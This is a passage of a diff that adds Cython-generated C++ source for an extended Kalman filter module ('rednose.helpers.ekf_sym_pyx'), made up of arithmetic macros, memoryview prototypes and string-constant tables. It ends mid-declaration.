+ #endif +#else + static CYTHON_INLINE int __Pyx_c_eq_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_sum_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_diff_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_prod_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_quot_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_neg_float(__pyx_t_float_complex); + static CYTHON_INLINE int __Pyx_c_is_zero_float(__pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_conj_float(__pyx_t_float_complex); + #if 1 + static CYTHON_INLINE float __Pyx_c_abs_float(__pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_pow_float(__pyx_t_float_complex, __pyx_t_float_complex); + #endif +#endif + +/* Arithmetic.proto */ +#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #define __Pyx_c_eq_double(a, b) ((a)==(b)) + #define __Pyx_c_sum_double(a, b) ((a)+(b)) + #define __Pyx_c_diff_double(a, b) ((a)-(b)) + #define __Pyx_c_prod_double(a, b) ((a)*(b)) + #define __Pyx_c_quot_double(a, b) ((a)/(b)) + #define __Pyx_c_neg_double(a) (-(a)) + #ifdef __cplusplus + #define __Pyx_c_is_zero_double(z) ((z)==(double)0) + #define __Pyx_c_conj_double(z) (::std::conj(z)) + #if 1 + #define __Pyx_c_abs_double(z) (::std::abs(z)) + #define __Pyx_c_pow_double(a, b) (::std::pow(a, b)) + #endif + #else + #define __Pyx_c_is_zero_double(z) ((z)==0) + #define __Pyx_c_conj_double(z) (conj(z)) + #if 1 + #define __Pyx_c_abs_double(z) (cabs(z)) + #define __Pyx_c_pow_double(a, b) (cpow(a, b)) + #endif + #endif +#else + static CYTHON_INLINE int __Pyx_c_eq_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_sum_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_diff_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_prod_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_quot_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_neg_double(__pyx_t_double_complex); + static CYTHON_INLINE int __Pyx_c_is_zero_double(__pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_conj_double(__pyx_t_double_complex); + #if 1 + static CYTHON_INLINE double __Pyx_c_abs_double(__pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_pow_double(__pyx_t_double_complex, __pyx_t_double_complex); + #endif +#endif + +/* MemviewSliceCopyTemplate.proto */ +static __Pyx_memviewslice +__pyx_memoryview_copy_new_contig(const __Pyx_memviewslice *from_mvs, + const char *mode, int ndim, + size_t sizeof_dtype, int contig_flag, + int dtype_is_object); + +/* MemviewSliceInit.proto */ +#define __Pyx_BUF_MAX_NDIMS %(BUF_MAX_NDIMS)d +#define __Pyx_MEMVIEW_DIRECT 1 +#define __Pyx_MEMVIEW_PTR 2 +#define __Pyx_MEMVIEW_FULL 4 +#define __Pyx_MEMVIEW_CONTIG 8 +#define __Pyx_MEMVIEW_STRIDED 16 +#define __Pyx_MEMVIEW_FOLLOW 32 +#define __Pyx_IS_C_CONTIG 1 +#define __Pyx_IS_F_CONTIG 2 +static int __Pyx_init_memviewslice( + struct __pyx_memoryview_obj *memview, + int ndim, + __Pyx_memviewslice *memviewslice, + int memview_is_new_reference); +static CYTHON_INLINE int __pyx_add_acquisition_count_locked( + __pyx_atomic_int_type *acquisition_count, PyThread_type_lock lock); +static CYTHON_INLINE int __pyx_sub_acquisition_count_locked( + __pyx_atomic_int_type *acquisition_count, PyThread_type_lock lock); +#define __pyx_get_slice_count_pointer(memview) (&memview->acquisition_count) +#define __PYX_INC_MEMVIEW(slice, have_gil) __Pyx_INC_MEMVIEW(slice, have_gil, __LINE__) +#define __PYX_XCLEAR_MEMVIEW(slice, have_gil) __Pyx_XCLEAR_MEMVIEW(slice, have_gil, __LINE__) +static CYTHON_INLINE void __Pyx_INC_MEMVIEW(__Pyx_memviewslice *, int, int); +static CYTHON_INLINE void __Pyx_XCLEAR_MEMVIEW(__Pyx_memviewslice *, int, int); + +/* TypeInfoToFormat.proto */ +struct __pyx_typeinfo_string { + char string[3]; +}; +static struct __pyx_typeinfo_string __Pyx_TypeInfoToFormat(__Pyx_TypeInfo *type); + +/* CIntFromPy.proto */ +static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_int(int value); + +/* None.proto */ +#include + +/* CIntFromPy.proto */ +static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *); + +/* CIntFromPy.proto */ +static CYTHON_INLINE char __Pyx_PyInt_As_char(PyObject *); + +/* FormatTypeName.proto */ +#if CYTHON_COMPILING_IN_LIMITED_API +typedef PyObject *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%U" +static __Pyx_TypeName __Pyx_PyType_GetName(PyTypeObject* tp); +#define __Pyx_DECREF_TypeName(obj) Py_XDECREF(obj) +#else +typedef const char *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%.200s" +#define __Pyx_PyType_GetName(tp) ((tp)->tp_name) +#define __Pyx_DECREF_TypeName(obj) +#endif + +/* CheckBinaryVersion.proto */ +static int __Pyx_check_binary_version(void); + +/* InitStrings.proto */ +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t); + +/* #### Code section: module_declarations ### */ +static PyObject *__pyx_array_get_memview(struct __pyx_array_obj *__pyx_v_self); /* proto*/ +static char *__pyx_memoryview_get_item_pointer(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index); /* proto*/ +static PyObject *__pyx_memoryview_is_slice(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_obj); /* proto*/ +static PyObject *__pyx_memoryview_setitem_slice_assignment(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_dst, PyObject *__pyx_v_src); /* proto*/ +static PyObject *__pyx_memoryview_setitem_slice_assign_scalar(struct __pyx_memoryview_obj *__pyx_v_self, struct __pyx_memoryview_obj *__pyx_v_dst, PyObject *__pyx_v_value); /* proto*/ +static PyObject *__pyx_memoryview_setitem_indexed(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value); /* proto*/ +static PyObject *__pyx_memoryview_convert_item_to_object(struct __pyx_memoryview_obj *__pyx_v_self, char *__pyx_v_itemp); /* proto*/ +static PyObject *__pyx_memoryview_assign_item_from_object(struct __pyx_memoryview_obj *__pyx_v_self, char *__pyx_v_itemp, PyObject *__pyx_v_value); /* proto*/ +static PyObject *__pyx_memoryview__get_base(struct __pyx_memoryview_obj *__pyx_v_self); /* proto*/ +static PyObject *__pyx_memoryviewslice_convert_item_to_object(struct __pyx_memoryviewslice_obj *__pyx_v_self, char *__pyx_v_itemp); /* proto*/ +static PyObject *__pyx_memoryviewslice_assign_item_from_object(struct __pyx_memoryviewslice_obj *__pyx_v_self, char *__pyx_v_itemp, PyObject *__pyx_v_value); /* proto*/ +static PyObject *__pyx_memoryviewslice__get_base(struct __pyx_memoryviewslice_obj *__pyx_v_self); /* proto*/ +static CYTHON_INLINE PyObject *__pyx_f_5numpy_7ndarray_4base_base(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE PyArray_Descr *__pyx_f_5numpy_7ndarray_5descr_descr(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE int __pyx_f_5numpy_7ndarray_4ndim_ndim(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE npy_intp *__pyx_f_5numpy_7ndarray_5shape_shape(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE npy_intp *__pyx_f_5numpy_7ndarray_7strides_strides(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE npy_intp __pyx_f_5numpy_7ndarray_4size_size(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE char *__pyx_f_5numpy_7ndarray_4data_data(PyArrayObject *__pyx_v_self); /* proto*/ + +/* Module declarations from "cython.view" */ +static struct __pyx_array_obj *__pyx_array_new(PyObject *, Py_ssize_t, char *, char *, char *); /*proto*/ + +/* Module declarations from "cython.dataclasses" */ + +/* Module declarations from "cython" */ + +/* Module declarations from "libc.string" */ + +/* Module declarations from "libcpp.string" */ + +/* Module declarations from "libcpp.vector" */ + +/* Module declarations from "libcpp" */ + +/* Module declarations from "libc.stdio" */ + +/* Module declarations from "__builtin__" */ + +/* Module declarations from "cpython.type" */ + +/* Module declarations from "cpython" */ + +/* Module declarations from "cpython.object" */ + +/* Module declarations from "cpython.ref" */ + +/* Module declarations from "numpy" */ + +/* Module declarations from "numpy" */ + +/* Module declarations from "rednose.helpers.ekf_sym_pyx" */ +static PyObject *__pyx_collections_abc_Sequence = 0; +static PyObject *generic = 0; +static PyObject *strided = 0; +static PyObject *indirect = 0; +static PyObject *contiguous = 0; +static PyObject *indirect_contiguous = 0; +static int __pyx_memoryview_thread_locks_used; +static PyThread_type_lock __pyx_memoryview_thread_locks[8]; +static PyArrayObject *__pyx_f_7rednose_7helpers_11ekf_sym_pyx_matrix_to_numpy(Eigen::Matrix); /*proto*/ +static PyArrayObject *__pyx_f_7rednose_7helpers_11ekf_sym_pyx_vector_to_numpy(Eigen::VectorXd); /*proto*/ +static std::string __pyx_convert_string_from_py_std__in_string(PyObject *); /*proto*/ +static std::vector __pyx_convert_vector_from_py_int(PyObject *); /*proto*/ +static std::vector __pyx_convert_vector_from_py_std_3a__3a_string(PyObject *); /*proto*/ +static int __pyx_array_allocate_buffer(struct __pyx_array_obj *); /*proto*/ +static struct __pyx_array_obj *__pyx_array_new(PyObject *, Py_ssize_t, char *, char *, char *); /*proto*/ +static PyObject *__pyx_memoryview_new(PyObject *, int, int, __Pyx_TypeInfo *); /*proto*/ +static CYTHON_INLINE int __pyx_memoryview_check(PyObject *); /*proto*/ +static PyObject *_unellipsify(PyObject *, int); /*proto*/ +static int assert_direct_dimensions(Py_ssize_t *, int); /*proto*/ +static struct __pyx_memoryview_obj *__pyx_memview_slice(struct __pyx_memoryview_obj *, PyObject *); /*proto*/ +static int __pyx_memoryview_slice_memviewslice(__Pyx_memviewslice *, Py_ssize_t, Py_ssize_t, Py_ssize_t, int, int, int *, Py_ssize_t, Py_ssize_t, Py_ssize_t, int, int, int, int); /*proto*/ +static char *__pyx_pybuffer_index(Py_buffer *, char *, Py_ssize_t, Py_ssize_t); /*proto*/ +static int __pyx_memslice_transpose(__Pyx_memviewslice *); /*proto*/ +static PyObject *__pyx_memoryview_fromslice(__Pyx_memviewslice, int, PyObject *(*)(char *), int (*)(char *, PyObject *), int); /*proto*/ +static __Pyx_memviewslice *__pyx_memoryview_get_slice_from_memoryview(struct __pyx_memoryview_obj *, __Pyx_memviewslice *); /*proto*/ +static void __pyx_memoryview_slice_copy(struct __pyx_memoryview_obj *, __Pyx_memviewslice *); /*proto*/ +static PyObject *__pyx_memoryview_copy_object(struct __pyx_memoryview_obj *); /*proto*/ +static PyObject *__pyx_memoryview_copy_object_from_slice(struct __pyx_memoryview_obj *, __Pyx_memviewslice *); /*proto*/ +static Py_ssize_t abs_py_ssize_t(Py_ssize_t); /*proto*/ +static char __pyx_get_best_slice_order(__Pyx_memviewslice *, int); /*proto*/ +static void _copy_strided_to_strided(char *, Py_ssize_t *, char *, Py_ssize_t *, Py_ssize_t *, Py_ssize_t *, int, size_t); /*proto*/ +static void copy_strided_to_strided(__Pyx_memviewslice *, __Pyx_memviewslice *, int, size_t); /*proto*/ +static Py_ssize_t __pyx_memoryview_slice_get_size(__Pyx_memviewslice *, int); /*proto*/ +static Py_ssize_t __pyx_fill_contig_strides_array(Py_ssize_t *, Py_ssize_t *, Py_ssize_t, int, char); /*proto*/ +static void *__pyx_memoryview_copy_data_to_temp(__Pyx_memviewslice *, __Pyx_memviewslice *, char, int); /*proto*/ +static int __pyx_memoryview_err_extents(int, Py_ssize_t, Py_ssize_t); /*proto*/ +static int __pyx_memoryview_err_dim(PyObject *, PyObject *, int); /*proto*/ +static int __pyx_memoryview_err(PyObject *, PyObject *); /*proto*/ +static int __pyx_memoryview_err_no_memory(void); /*proto*/ +static int __pyx_memoryview_copy_contents(__Pyx_memviewslice, __Pyx_memviewslice, int, int, int); /*proto*/ +static void __pyx_memoryview_broadcast_leading(__Pyx_memviewslice *, int, int); /*proto*/ +static void __pyx_memoryview_refcount_copying(__Pyx_memviewslice *, int, int, int); /*proto*/ +static void __pyx_memoryview_refcount_objects_in_slice_with_gil(char *, Py_ssize_t *, Py_ssize_t *, int, int); /*proto*/ +static void __pyx_memoryview_refcount_objects_in_slice(char *, Py_ssize_t *, Py_ssize_t *, int, int); /*proto*/ +static void __pyx_memoryview_slice_assign_scalar(__Pyx_memviewslice *, int, size_t, void *, int); /*proto*/ +static void __pyx_memoryview__slice_assign_scalar(char *, Py_ssize_t *, Py_ssize_t *, int, size_t, void *); /*proto*/ +static PyObject *__pyx_unpickle_Enum__set_state(struct __pyx_MemviewEnum_obj *, PyObject *); /*proto*/ +static PyObject *__pyx_format_from_typeinfo(__Pyx_TypeInfo *); /*proto*/ +/* #### Code section: typeinfo ### */ +static __Pyx_TypeInfo __Pyx_TypeInfo_double = { "double", NULL, sizeof(double), { 0 }, 0, 'R', 0, 0 }; +static __Pyx_TypeInfo __Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t = { "float64_t", NULL, sizeof(__pyx_t_5numpy_float64_t), { 0 }, 0, 'R', 0, 0 }; +/* #### Code section: before_global_var ### */ +#define __Pyx_MODULE_NAME "rednose.helpers.ekf_sym_pyx" +extern int __pyx_module_is_main_rednose__helpers__ekf_sym_pyx; +int __pyx_module_is_main_rednose__helpers__ekf_sym_pyx = 0; + +/* Implementation of "rednose.helpers.ekf_sym_pyx" */ +/* #### Code section: global_var ### */ +static PyObject *__pyx_builtin_NotImplementedError; +static PyObject *__pyx_builtin_TypeError; +static PyObject *__pyx_builtin___import__; +static PyObject *__pyx_builtin_ValueError; +static PyObject *__pyx_builtin_MemoryError; +static PyObject *__pyx_builtin_enumerate; +static PyObject *__pyx_builtin_range; +static PyObject *__pyx_builtin_AssertionError; +static PyObject *__pyx_builtin_Ellipsis; +static PyObject *__pyx_builtin_id; +static PyObject *__pyx_builtin_IndexError; +static PyObject *__pyx_builtin_ImportError; +/* #### Code section: string_decls ### */ +static const char __pyx_k_[] = ": "; +static const char __pyx_k_C[] = "C"; +static const char __pyx_k_N[] = "N"; +static const char __pyx_k_O[] = "O"; +static const char __pyx_k_P[] = "P"; +static const char __pyx_k_Q[] = "Q"; +static const char __pyx_k_R[] = "R"; +static const char __pyx_k_T[] = "T{"; + static const char __pyx_k_a[] = "a"; + static const char __pyx_k_c[] = "c"; + static const char __pyx_k_t[] = "t"; + static const char __pyx_k_x[] = "x"; + static const char __pyx_k_z[] = "z"; + static const char __pyx_k_Ri[] = "Ri"; + static const char __pyx_k__2[] = "."; + static const char __pyx_k__3[] = "*"; + static const char __pyx_k__6[] = "'"; + static const char __pyx_k__7[] = ")"; + static const char __pyx_k__9[] = "^"; + static const char __pyx_k_gc[] = "gc"; + static const char __pyx_k_id[] = "id"; + static const char __pyx_k_np[] = "np"; + static const char __pyx_k_zi[] = "zi"; + static const char __pyx_k__10[] = ""; + static const char __pyx_k__11[] = ":"; +static const char __pyx_k__12[] = "}"; +static const char __pyx_k__13[] = "("; +static const char __pyx_k__14[] = ","; +static const char __pyx_k__58[] = "?"; +static const char __pyx_k_abc[] = "abc"; +static const char __pyx_k_and[] = " and "; +static const char __pyx_k_got[] = " (got "; +static const char __pyx_k_nan[] = "nan"; +static const char __pyx_k_new[] = "__new__"; +static const char __pyx_k_obj[] = "obj"; +static const char __pyx_k_res[] = "res"; +static const char __pyx_k_sys[] = "sys"; +static const char __pyx_k_val[] = "val"; +static const char __pyx_k_Ri_b[] = "Ri_b"; +static const char __pyx_k_args[] = "args"; +static const char __pyx_k_base[] = "base"; +static const char __pyx_k_copy[] = "copy"; +static const char __pyx_k_covs[] = "covs"; +static const char __pyx_k_dict[] = "__dict__"; +static const char __pyx_k_join[] = "join"; +static const char __pyx_k_kind[] = "kind"; +static const char __pyx_k_main[] = "__main__"; +static const char __pyx_k_mode[] = "mode"; +static const char __pyx_k_name[] = "name"; +static const char __pyx_k_ndim[] = "ndim"; +static const char __pyx_k_pack[] = "pack"; +static const char __pyx_k_self[] = "self"; +static const char __pyx_k_size[] = "size"; +static const char __pyx_k_spec[] = "__spec__"; +static const char __pyx_k_step[] = "step"; +static const char __pyx_k_stop[] = "stop"; +static const char __pyx_k_test[] = "__test__"; +static const char __pyx_k_utf8[] = "utf8"; +static const char __pyx_k_zi_b[] = "zi_b"; +static const char __pyx_k_ASCII[] = "ASCII"; +static const char __pyx_k_R_map[] = "R_map"; +static const char __pyx_k_class[] = "__class__"; +static const char __pyx_k_count[] = "count"; +static const char __pyx_k_dtype[] = "dtype"; +static const char __pyx_k_error[] = "error"; +static const char __pyx_k_flags[] = "flags"; +static const char __pyx_k_index[] = "index"; +static const char __pyx_k_numpy[] = "numpy"; +static const char __pyx_k_order[] = "order"; +static const char __pyx_k_range[] = "range"; +static const char __pyx_k_shape[] = "shape"; +static const char __pyx_k_start[] = "start"; +static const char __pyx_k_state[] = "state"; +static const char __pyx_k_z_map[] = "z_map"; +static const char __pyx_k_covs_b[] = "covs_b"; +static const char __pyx_k_double[] = "double"; +static const char __pyx_k_enable[] = "enable"; +static const char __pyx_k_encode[] = "encode"; +static const char __pyx_k_format[] = "format"; +static const char __pyx_k_import[] = "__import__"; +static const char __pyx_k_logger[] = "logger"; +static const char __pyx_k_name_2[] = "__name__"; +static const char __pyx_k_pickle[] = "pickle"; +static const char __pyx_k_reduce[] = "__reduce__"; +static const char __pyx_k_struct[] = "struct"; +static const char __pyx_k_tmpvec[] = "tmpvec"; +static const char __pyx_k_unpack[] = "unpack"; +static const char __pyx_k_update[] = "update"; +static const char __pyx_k_asarray[] = "asarray"; +static const char __pyx_k_augment[] = "augment"; +static const char __pyx_k_disable[] = "disable"; +static const char __pyx_k_fortran[] = "fortran"; +static const char __pyx_k_gen_dir[] = "gen_dir"; +static const char __pyx_k_memview[] = "memview"; +static const char __pyx_k_predict[] = "predict"; +static const char __pyx_k_state_b[] = "state_b"; +static const char __pyx_k_Ellipsis[] = "Ellipsis"; +static const char __pyx_k_Sequence[] = "Sequence"; +static const char __pyx_k_args_map[] = "args_map"; +static const char __pyx_k_dim_main[] = "dim_main"; +static const char __pyx_k_getstate[] = "__getstate__"; +static const char __pyx_k_itemsize[] = "itemsize"; +static const char __pyx_k_pyx_type[] = "__pyx_type"; +static const char __pyx_k_register[] = "register"; +static const char __pyx_k_setstate[] = "__setstate__"; +static const char __pyx_k_P_initial[] = "P_initial"; +static const char __pyx_k_TypeError[] = "TypeError"; +static const char __pyx_k_enumerate[] = "enumerate"; +static const char __pyx_k_estimates[] = "estimates"; +static const char __pyx_k_isenabled[] = "isenabled"; +static const char __pyx_k_maha_test[] = "maha_test"; +static const char __pyx_k_pyx_state[] = "__pyx_state"; +static const char __pyx_k_reduce_ex[] = "__reduce_ex__"; +static const char __pyx_k_x_initial[] = "x_initial"; +static const char __pyx_k_IndexError[] = "IndexError"; +static const char __pyx_k_ValueError[] = "ValueError"; +static const char __pyx_k_extra_args[] = "extra_args"; +static const char __pyx_k_global_var[] = "global_var"; +static const char __pyx_k_init_state[] = "init_state"; +static const char __pyx_k_norm_quats[] = "norm_quats"; +static const char __pyx_k_pyx_result[] = "__pyx_result"; +static const char __pyx_k_pyx_vtable[] = "__pyx_vtable__"; +static const char __pyx_k_rts_smooth[] = "rts_smooth"; +static const char __pyx_k_set_global[] = "set_global"; +static const char __pyx_k_EKF_sym_pyx[] = "EKF_sym_pyx"; +static const char __pyx_k_ImportError[] = "ImportError"; +static const char __pyx_k_MemoryError[] = "MemoryError"; +static const char __pyx_k_PickleError[] = "PickleError"; +static const char __pyx_k_collections[] = "collections"; +static const char __pyx_k_dim_augment[] = "dim_augment"; +static const char __pyx_k_filter_time[] = "filter_time"; +static const char __pyx_k_global_vars[] = "global_vars"; +static const char __pyx_k_maha_thresh[] = "maha_thresh"; +static const char __pyx_k_dim_main_err[] = "dim_main_err"; +static const char __pyx_k_initializing[] = "_initializing"; +static const char __pyx_k_is_coroutine[] = "_is_coroutine"; +static const char __pyx_k_pyx_checksum[] = "__pyx_checksum"; +static const char __pyx_k_reset_rewind[] = "reset_rewind"; +static const char __pyx_k_stringsource[] = ""; +static const char __pyx_k_version_info[] = "version_info"; +static const char __pyx_k_class_getitem[] = "__class_getitem__"; +static const char __pyx_k_reduce_cython[] = "__reduce_cython__"; +static const char __pyx_k_AssertionError[] = "AssertionError"; +static const char __pyx_k_extra_args_map[] = "extra_args_map"; +static const char __pyx_k_max_rewind_age[] = "max_rewind_age"; +static const char __pyx_k_View_MemoryView[] = "View.MemoryView"; +static const char __pyx_k_allocate_buffer[] = "allocate_buffer"; +static const char __pyx_k_collections_abc[] = "collections.abc"; +static const char __pyx_k_dim_augment_err[] = "dim_augment_err"; +static const char __pyx_k_dtype_is_object[] = "dtype_is_object"; +static const char __pyx_k_get_filter_time[] = "get_filter_time"; +static const char __pyx_k_maha_test_kinds[] = "maha_test_kinds"; +static const char __pyx_k_pyx_PickleError[] = "__pyx_PickleError"; +static const char __pyx_k_quaternion_idxs[] = "quaternion_idxs"; +static const char __pyx_k_set_filter_time[] = "set_filter_time"; +static const char __pyx_k_setstate_cython[] = "__setstate_cython__"; +static const char __pyx_k_EKF_sym_pyx_covs[] = "EKF_sym_pyx.covs"; +static const char __pyx_k_EKF_sym_pyx_state[] = "EKF_sym_pyx.state"; +static const char __pyx_k_ascontiguousarray[] = "ascontiguousarray"; +static const char __pyx_k_get_augment_times[] = "get_augment_times"; +static const char __pyx_k_pyx_unpickle_Enum[] = "__pyx_unpickle_Enum"; +static const char __pyx_k_asyncio_coroutines[] = "asyncio.coroutines"; +static const char __pyx_k_cline_in_traceback[] = "cline_in_traceback"; +static const char __pyx_k_strided_and_direct[] = ""; +static const char __pyx_k_EKF_sym_pyx_augment[] = "EKF_sym_pyx.augment"; +static const char __pyx_k_EKF_sym_pyx_predict[] = "EKF_sym_pyx.predict"; +static const char __pyx_k_NotImplementedError[] = "NotImplementedError"; +static const char __pyx_k_strided_and_indirect[] = ""; +static const char __pyx_k_EKF_sym_pyx_maha_test[] = "EKF_sym_pyx.maha_test"; +static const char __pyx_k_Invalid_shape_in_axis[] = "Invalid shape in axis "; +static const char __pyx_k_contiguous_and_direct[] = ""; +static const char __pyx_k_Cannot_index_with_type[] = "Cannot index with type '"; +static const char __pyx_k_EKF_sym_pyx_init_state[] = "EKF_sym_pyx.init_state"; +static const char __pyx_k_EKF_sym_pyx_rts_smooth[] = "EKF_sym_pyx.rts_smooth"; +static const char __pyx_k_EKF_sym_pyx_set_global[] = "EKF_sym_pyx.set_global"; +static const char __pyx_k_MemoryView_of_r_object[] = ""; +static const char __pyx_k_MemoryView_of_r_at_0x_x[] = ""; +static const char __pyx_k_contiguous_and_indirect[] = ""; +static const char __pyx_k_EKF_sym_pyx_reset_rewind[] = "EKF_sym_pyx.reset_rewind"; +static const char __pyx_k_predict_and_update_batch[] = "predict_and_update_batch"; +static const char __pyx_k_Dimension_d_is_not_direct[] = "Dimension %d is not direct"; +static const char __pyx_k_Index_out_of_bounds_axis_d[] = "Index out of bounds (axis %d)"; +static const char __pyx_k_EKF_sym_pyx___reduce_cython[] = "EKF_sym_pyx.__reduce_cython__"; +static const char __pyx_k_EKF_sym_pyx_get_filter_time[] = "EKF_sym_pyx.get_filter_time"; +static const char __pyx_k_EKF_sym_pyx_set_filter_time[] = "EKF_sym_pyx.set_filter_time"; +static const char __pyx_k_Step_may_not_be_zero_axis_d[] = "Step may not be zero (axis %d)"; +static const char __pyx_k_itemsize_0_for_cython_array[] = "itemsize <= 0 for cython.array"; +static const char __pyx_k_rednose_helpers_ekf_sym_pyx[] = "rednose.helpers.ekf_sym_pyx"; +static const char __pyx_k_EKF_sym_pyx___setstate_cython[] = "EKF_sym_pyx.__setstate_cython__"; +static const char __pyx_k_EKF_sym_pyx_get_augment_times[] = "EKF_sym_pyx.get_augment_times"; +static const char __pyx_k_unable_to_allocate_array_data[] = "unable to allocate array data."; +static const char __pyx_k_strided_and_direct_or_indirect[] = ""; +static const char __pyx_k_numpy_core_multiarray_failed_to[] = "numpy.core.multiarray failed to import"; +static const char __pyx_k_rednose_helpers_ekf_sym_pyx_pyx[] = "rednose/helpers/ekf_sym_pyx.pyx"; +static const char __pyx_k_All_dimensions_preceding_dimensi[] = "All dimensions preceding dimension %d must be indexed and not sliced"; +static const char __pyx_k_Buffer_view_does_not_expose_stri[] = "Buffer view does not expose strides"; +static const char __pyx_k_Can_only_create_a_buffer_that_is[] = "Can only create a buffer that is contiguous in memory."; +static const char __pyx_k_Cannot_assign_to_read_only_memor[] = "Cannot assign to read-only memoryview"; +static const char __pyx_k_Cannot_create_writable_memory_vi[] = "Cannot create writable memory view from read-only memoryview"; +static const char __pyx_k_Cannot_transpose_memoryview_with[] = "Cannot transpose memoryview with indirect dimensions"; +static const char __pyx_k_EKF_sym_pyx_predict_and_update_b[] = "EKF_sym_pyx.predict_and_update_batch"; +static const char __pyx_k_Empty_shape_tuple_for_cython_arr[] = "Empty shape tuple for cython.array"; +static const char __pyx_k_Incompatible_checksums_0x_x_vs_0[] = "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))"; +static const char __pyx_k_Indirect_dimensions_not_supporte[] = "Indirect dimensions not supported"; +static const char __pyx_k_Invalid_mode_expected_c_or_fortr[] = "Invalid mode, expected 'c' or 'fortran', got "; +static const char __pyx_k_Out_of_bounds_on_buffer_access_a[] = "Out of bounds on buffer access (axis "; +static const char __pyx_k_Unable_to_convert_item_to_object[] = "Unable to convert item to object"; +static const char __pyx_k_got_differing_extents_in_dimensi[] = "got differing extents in dimension "; +static const char __pyx_k_no_default___reduce___due_to_non[] = "no default __reduce__ due to non-trivial __cinit__"; +static const char __pyx_k_numpy_core_umath_failed_to_impor[] = "numpy.core.umath failed to import"; +static const char __pyx_k_unable_to_allocate_shape_and_str[] = "unable to allocate shape and strides."; +/* #### Code section: decls ### */ +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array___cinit__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_shape, Py_ssize_t __pyx_v_itemsize, PyObject *__pyx_v_format, PyObject *__pyx_v_mode, int __pyx_v_allocate_buffer); /* proto */ +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array_2__getbuffer__(struct __pyx_array_obj *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /* proto */ +static void __pyx_array___pyx_pf_15View_dot_MemoryView_5array_4__dealloc__(struct __pyx_array_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_5array_7memview___get__(struct __pyx_array_obj *__pyx_v_self); /* proto */ +static Py_ssize_t __pyx_array___pyx_pf_15View_dot_MemoryView_5array_6__len__(struct __pyx_array_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_array___pyx_pf_15View_dot_MemoryView_5array_8__getattr__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_attr); /* proto */ +static PyObject *__pyx_array___pyx_pf_15View_dot_MemoryView_5array_10__getitem__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_item); /* proto */ +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array_12__setitem__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_item, PyObject *__pyx_v_value); /* proto */ +static PyObject *__pyx_pf___pyx_array___reduce_cython__(CYTHON_UNUSED struct __pyx_array_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_array_2__setstate_cython__(CYTHON_UNUSED struct __pyx_array_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static int __pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum___init__(struct __pyx_MemviewEnum_obj *__pyx_v_self, PyObject *__pyx_v_name); /* proto */ +static PyObject *__pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum_2__repr__(struct __pyx_MemviewEnum_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_MemviewEnum___reduce_cython__(struct __pyx_MemviewEnum_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_MemviewEnum_2__setstate_cython__(struct __pyx_MemviewEnum_obj *__pyx_v_self, PyObject *__pyx_v___pyx_state); /* proto */ +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview___cinit__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_obj, int __pyx_v_flags, int __pyx_v_dtype_is_object); /* proto */ +static void 